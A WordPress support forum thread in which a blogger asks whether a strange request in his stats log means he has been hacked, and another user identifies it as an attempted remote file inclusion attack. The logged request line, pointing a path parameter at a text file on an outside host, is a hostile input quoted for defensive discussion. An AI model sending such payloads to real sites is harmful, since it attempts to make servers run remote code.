Support » Fixing WordPress » How do I know whether this is a hack?

  • jeremycherfas

    (@jeremycherfas)


    Looking at slimstat for my blog today, I noticed a reference to this as a New resource

    /wp/Archive/2005/05/17/mything-tips//embed/day.php?path=http://www.iglesialcs.cl/newweb/cache/test.txt???

    I have no idea what this means. The URL at the end of the string seems to be an evangelical website, which is unlikely to have linked to me.

    I’m worried about that //embed directory. I am not aware of any such structure in my setup.

    So, could this be some sort of hack? How do I check? And what do I do about it?

    I’ve read Donncha’s article, and while it is all very helpful, even if I don’t understand some of it, it doesn’t answer the key question: How do I know whether I have been hacked?

    Obviously I am going to check all my PHP scripts and upload files as soon as I can (no access here), but in the meantime, I would be grateful for any advice anyone can offer.

    Thanks

Viewing 2 replies - 1 through 2 (of 2 total)
  • whooami

    (@whooami)

    Member

    thats an attempted RFI attack. They happen constantly.

    jeremycherfas

    (@jeremycherfas)

    Thanks. I had a look at the Wikipedia entry for Remote File Inclusion hack, and I have a slightly better idea of what that means.

    Follow up question: is the average WP installation vulnerable to this sort of attack, or can I just ignore it?

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘How do I know whether this is a hack?’ is closed to new replies.